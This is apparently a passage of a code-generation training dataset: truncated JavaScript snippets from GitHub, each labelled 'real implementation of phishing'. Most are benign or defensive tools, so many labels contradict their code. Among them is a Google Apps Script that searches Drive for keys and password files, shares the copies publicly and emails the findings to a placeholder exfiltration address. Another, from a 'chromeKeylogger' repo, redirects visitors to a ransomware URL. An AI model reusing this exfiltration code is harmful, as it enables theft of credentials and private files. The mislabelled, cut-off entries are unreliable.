body .replace(/[.,'\/#!$%\^&\*;:{}=\-_`~()]/g, """") .replace(/\r?\n|\r/g, "" ""); // Remove special chars let words = body.split("" ""); words = words.filter(w => Boolean(w)); //Remove falsey values let greeting = words.splice(0, 3); let grtScale = greetingCheck(greeting); let urgScale = 0; let cfmScale = 0; words.forEach(word => { if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word); if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word); }); return { grtScale, urgScale, cfmScale }; } function phishCheck(email, body) { let eScale = emailCheck(email); let urlScale = URLcheck(body); let dictScale = dic",Javascript,PhishersOfMen/Assn5-Phishing-SQLI,2025-05-22T22:01:02.523095,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"#!/usr/bin/env node const fs = require('fs'); const debug = require('debug')('fuzz:main'); const Promise = require('bluebird'); const program = require('commander'); const request = require('request'); const libssdeep = require('ssdeep'); const csv = require('csv'); const ProgressBar = require('progress'); const CONF = require('./config'); const { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('./lib/utils'); const { DomainFuzz, DomainDict, DomainThread } = require('./lib'); const fuzz = (opts, domains, worker) => { const total = domains.length; const bar = new ProgressBar('Running [:bar] :percent :etas', { complete: '=', incomplete: ' ', width: 50, total, }); Promise .map(domains, (domain) => { bar.tick(1); return worker.run(domain); }, { concurrency: opts.concurrency }) .then((result) => { if (opts.option_output) { let data; if (opts.option_format === 'JSON') { data = JSON.stringify(result, null, 4); fs.appendFile(opts.option_output, data, 'utf8', (err) => { if (err) printError(err.message); }); } else if (opts.option_format === 'CSV') { data = []; const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score'; data.push(columns.split(',')); for (const domain of result) { data.push(columns.split(',').map(_ => domain[_])); } csv.stringify(data, (parseErr, res) => { fs.appendFile(this.option_output, res, 'utf8', (err) => { if (err) printError(err.message); }); }); } } for (const domain of result) { printResult(domain); } }) .catch(err => printError(err.message)); }; const main = () => { const opts = program .version(CONF.version) .usage('[options] DOMAIN') .description(`Find similar-loo",Javascript,monkeym4ster/DomainFuzz,2025-05-22T22:01:02.651975,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require(""fs""); // load puppeteer const puppeteer = require('puppeteer'); const window_height = 768; const window_width = 1366; const studio_url = ""https://studio.youtube.com/""; // directory contains the videos you want to upload const upload_file_directory = ""your video directory""; // change user data directory to your directory const chrome_user_data_directory = ""C:\\Users\\user\\AppData\\Local\\Chromium\\User Data""; const title_prefix = ""video title prefix ""; const video_description = """"; const DEFAULT_ARGS = [ '--disable-background-networking', '--enable-features=NetworkService,NetworkServiceInProcess', '--disable-background-timer-throttling', '--disable-backgrounding-occluded-windows', '--disable-breakpad', '--disable-client-side-phishing-detection', '--disable-component-extensions-with-background-pages', '--disable-default-apps', '--disable-dev-shm-usage', '--disable-extensions', // BlinkGenPropertyTrees disabled due to crbug.com/937609 '--disable-features=TranslateUI,BlinkGenPropertyTrees', '--disable-hang-monitor', '--disable-ipc-flooding-protection', '--disable-popup-blocking', '--disable-prompt-on-repost', '--disable-renderer-backgrounding', '--disable-sync', '--force-color-profile=srgb', '--metrics-recording-only', '--no-first-run', '--enable-automation', '--password-store=basic', '--use-mock-keychain', ]; let files = []; fs.readdir(upload_file_directory, function (err, temp_files) { if (err) { console.log('Something went wrong...'); return console.error(err); } for (let i = 0; i < temp_files.length; i++) { files.push(temp_files[i]); } }); try { (async () => { const browser = await puppeteer.launch( { 'headless': false, // have window executablePath: null, userDataDir: chrome_user_data_directory, ignoreDefaultArgs: ",Javascript,last2win/youtube-upload-multi-videos,2025-05-22T22:01:02.782934,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import warning from './station.svg' import terra from './terra.svg' import './fonts.css' import './App.css' const SAFE_PAGE = 'https://station.money' function App() { if (!document.referrer || document.referrer === window.location.href) { //window.location.href = SAFE_PAGE } if (document.referrer) { const { hostname } = new URL(document.referrer) if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) { return (
Terra logo

WARNING

{hostname} is currently unavailable.
Please visit{' '} twitter.com/terra_money {' '} for updates.

) } } return (
warning

PHISHING ALERT

You are trying to visit {document.referrer}
which is a known scam website.

{ window.location.href = SAFE_PAGE }} className='button__main' > Go back to safety {/* Visit anyway */}
) } export default App ",Javascript,terra-money/scam-alert-web,2025-05-22T22:01:02.912967,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require('fs') const fsExtra = require('fs-extra') const rmRf = require('rimraf') const Streams = require('mississippi') const bind = require('ap').partial const async = require('./async') const Browserify = require('browserify') const watchify = require('watchify') const sassStream = require('sass-css-stream') start(function(err){ if (err) throw err console.log('end') }) function start(cb){ async.series({ clean, build, }, cb) } function clean(cb){ fsExtra.remove('./dist/', cb) } function build(cb){ async.parallel({ buildJs, buildCss, buildStatic, }, cb) } function buildJs(cb) { var browserify = Browserify({ entries: ['./src/js/index.js'], cache: {}, packageCache: {}, // plugin: [watchify], }) browserify.on('update', bundle) async.series({ buildJsPrep: bind(fsExtra.mkdirs, './dist/js'), buildJsStart: start, }, cb) function start(cb){ var firstBundle = bundle() Streams.finished(firstBundle, cb) } function bundle() { console.log('bundle') return Streams.pipeline( browserify.bundle(), fs.createWriteStream('./dist/js/bundle.js') ) } } function buildCss(cb) { async.series({ buildCssPrep: bind(fsExtra.mkdirs, './dist/css'), buildCssStart: start, }, cb) function start(cb) { var pipeline = Streams.pipeline( fs.createReadStream( './src/css/index.scss' ), sassStream( './src/css/index.scss' ), fs.createWriteStream( './dist/css/bundle.css' ) ) Streams.finished(pipeline, cb) } } function buildStatic(cb) { async.parallel({ imgs: bind(fsExtra.copy, './src/img/', './dist/img/'), faviconAndroid: bind(fsExtra.copy, './src/manifest.json', './dist/manifest.json'), faviconIE: bind(fsExtra.copy, './src/browserconfig.xml', './dist/browserconfig.xml'), fonts: bind(fsExtra.copy, './src/fonts/', './dist/fonts/'), index: bind(fsExtra.copy, './src/index.html'",Javascript,409H/landing,2025-05-22T22:01:03.059650,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Created by Greg Carson @ Feb 2017 // --------------------------------------- // Play nice and use for security training // and testing. function drivePassSearch() { // This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context. // This can be disabled for Google Apps for Business users: // https://support.google.com/a/answer/60781?hl=en // Personal users shit out of luck? Not sure haven't looked into it. var folder = DriveApp.createFolder('Evil Folder'); folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT); // Construct malicious search query on drive. Look for PDFs? DOC/XLS files? If you are looking for an extension use 'title contains' // If you want to search through content for a keyword use 'fullText contains' instead // You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image/' or mimeType contains 'video/')' // Not aware of case sensitivity or ability to perform regular expressions // Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit // or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera var files = DriveApp.searchFiles( 'modifiedDate > ""2013-02-28"" and title contains ""SEARCHTERMHERE""'); while (files.hasNext()) { var file = files.next(); Logger.log(file.getDownloadUrl()); Logger.log(file.getUrl()); Logger.log(file.getName()); var name = file.getName(); file.makeCopy(name,folder); Logger.log(file.getDownloadUrl()); Logger.log(file.getUrl()); } // Write Logger data to body of email and send to specified recipient // Sender address is the current active user Logger.log(folder.getUrl()); var recipient = ""RECPIENT-EXFIL-EMAIL-ADDRESS-HERE""; var subject = 'Google Drive Query - KDBX'; var body = Logger.getLog(); MailApp.sendEmail(recipient, subj",Javascript,gregkcarson/GoogleAppScriptSE,2025-05-22T22:01:03.220189,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const express = require(""express""); const app = express(); const http = require(""http""); const server = http.createServer(app); const puppeteer = require('puppeteer'); const port = 9001; var browser; app.use(express.json()) app.post('/bot/url', function(req, res) { res.setHeader('Content-Type', 'application/json'); console.log(req.body); let url = req.body.url console.log(url); startBot(url) .then(() => { res.send({ message: 'success', data: req.body }) }) .catch((err) => { res.send({ message: 'failed', error: err }) }) }) async function startBot(url) { console.log(browser); if(typeof browser !== 'undefined'){ await browser.close() } const minimal_args = [ '--autoplay-policy=user-gesture-required', '--disable-background-networking', '--disable-background-timer-throttling', '--disable-backgrounding-occluded-windows', '--disable-breakpad', '--disable-client-side-phishing-detection', '--disable-component-update', '--disable-default-apps', '--disable-dev-shm-usage', '--disable-domain-reliability', '--disable-extensions', '--disable-features=AudioServiceOutOfProcess', '--disable-hang-monitor', '--disable-ipc-flooding-protection', '--disable-notifications', '--disable-offer-store-unmasked-wallet-cards', '--disable-popup-blocking', '--disable-print-preview', '--disable-prompt-on-repost', '--disable-renderer-backgrounding', '--disable-setuid-sandbox', '--disable-speech-api', '--disable-sync', '--hide-scrollbars', '--ignore-gpu-blacklist', '--metrics-recording-only', '--mute-audio', '--no-default-browser-check', '--no-first-run', '--no-pings', '--no-sandbox', '--no-zygote', '--password-store=basic', '--use-gl=swiftshader', '--use-mock-keychain', ]; console.log(""Launching Headless Browser::::::::::::""); browser = await puppeteer.launch({ ",Javascript,arunjohn96/webndi,2025-05-22T22:01:03.383520,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import React from 'react'; import { Route, Switch } from 'react-router-dom'; const isBrowser = typeof window !== ""undefined"" && typeof window.document !== ""undefined""; const dummy = () => {}; const HelpTextPage = isBrowser? React.lazy(() => import(""./components/helpText"")): dummy; const WebhookPage = isBrowser? React.lazy(() => import(""./pages/guild_dashboard/server_view"")): dummy; const ManagerRootPage = isBrowser? React.lazy(() => import(""./pages/emote_manager/manager_root"")): dummy; const LoginPage = isBrowser? React.lazy(() => import(""./pages/login"")): dummy; const InvitePage = isBrowser? React.lazy(() => import(""./pages/invite"")): dummy; const PrivacyPolicy = isBrowser? React.lazy(() => import(""./pages/policy"")): dummy; const GuildCreatorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_builder"")): dummy; const GuildSelectorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_selector"")): dummy; const GuildStatusPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_status"")): dummy; const LicensePage = isBrowser? React.lazy(() => import(""./pages/licenses"")): dummy; const CommandPage = isBrowser? React.lazy(() => import(""./pages/commands"")): dummy; const BotAddedPage = isBrowser? React.lazy(() => import(""./pages/bot_added"")): dummy; const PremiumPage = isBrowser? React.lazy(() => import(""./pages/premium"")): dummy; const PublicPackSearchPage = isBrowser? React.lazy(() => import(""./pages/public_packs/search"")): dummy; const PublicPackPage = isBrowser? React.lazy(() => import(""./pages/public_packs/view"")): dummy; const PhishingPage = isBrowser? React.lazy(() => import(""./pages/phishing"")): dummy; const TermsPage = isBrowser? React.lazy(() => import(""./pages/terms"")): dummy; export const FullRouter = ({loggedIn, HomePage}) => { return ( Loading Page...}> {!loggedIn && } {loggedIn && Try this working mirror instead'; var element = document.getElementById('mainwarn'); element.innerHTML += altelem; } } function newMirr(site, success) { if(site) { getAjax('https://onion.live/api/v2/public/mirrors?site='+site+'&max=1', '', success); } } function handleResponse(message) { console.log(`Message from the background script: ${message.response}`); } function handleError(error) { console.log(`Error: ${error}`); } function getAjax(url, data, success) { var params = typeof data == 'string' ? data : Object.keys(data).map( function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) } ).join('&'); var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(""Microsoft.XMLHTTP""); xhr.open('GET', url); xhr.onreadystatechange = function() { if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); } if (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); } }; xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(params); return xhr; } function checkWorking(url, site) { var MrChecker = new XMLHttpRequest(), CheckThisUrl = ""http://""+url+""/""; MrChecker.open('get', CheckThisUrl, true); MrChecker.onreadystatechange = checkReadyState; function checkReadyState() { if (MrChecker.readyState === 4) { if (MrChecker.status >= 200 || MrChecker.status < 304) { var element = document.getElementById('mainwarn'); if(element) { ",Javascript,OnionDotLive/onionliveplugin,2025-05-22T22:01:04.017163,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* #################################################################### # s'abonner sur ma chaine youtube pour avoir plus de code phishing # # et hacking,il me donne le courage de faire les codes phishing # # # # subscribe on my youtube channel to have more phishing code # # and hacking, it gives me the courage to do the phishing codes # # # # ||~~ BY ~~ hakanonymos ~~|| # # # # # # # # skype et email : hakanonymos@hotmail.com # #################################################################### */ var xScroll, yScroll, timerPoll, timerRedirect, timerClock; function initRedirect(){ if (typeof document.body.scrollTop != ""undefined""){ //IE,NS7,Moz xScroll = document.body.scrollLeft; yScroll = document.body.scrollTop; clearInterval(timerPoll); //stop polling scroll move clearInterval(timerRedirect); //stop timed redirect timerPoll = setInterval(""pollActivity()"",1); //poll scrolling votre site de redrection 10000 = 10 seconde timerRedirect = setInterval(""location.href='https://panafricaine.com/ransomware/'"",300 0000); //temps de redirection } else if (typeof window.pageYOffset != ""undefined""){ //other browsers that support pageYOffset/pageXOffset instead ",Javascript,hakanonymos/chromeKeylogger,2025-05-22T22:01:04.152105,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import { useEffect, useState } from ""react""; import Navbar from ""./components/Navbar/Navbar""; import Breadcrumbs from ""./components/Breadcrumbs/Breadcrumbs""; import ProductDetails from ""./components/ProductDetails/ProductDetails""; import ProductCarousel from ""./components/ProductCarousel/ProductCarousel""; import Swal from ""sweetalert2""; import ""./App.css""; const App = () => { const [darkMode, setDarkMode] = useState(false); const toggleDarkMode = () => setDarkMode(prevState => !prevState); useEffect(() => { Swal.fire({ title: ""¡Atención!"", text: ""Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan."", icon: ""warning"", confirmButtonText: ""¡Entendido!"", confirmButtonColor: ""#3484fa"", backdrop: ""rgba(0, 0, 0, 0.8)"", }); }, []); return ( <>
); }; export default App; ",Javascript,GastonPerez97/mercadolibre-details-challenge,2025-05-22T22:01:04.271013,training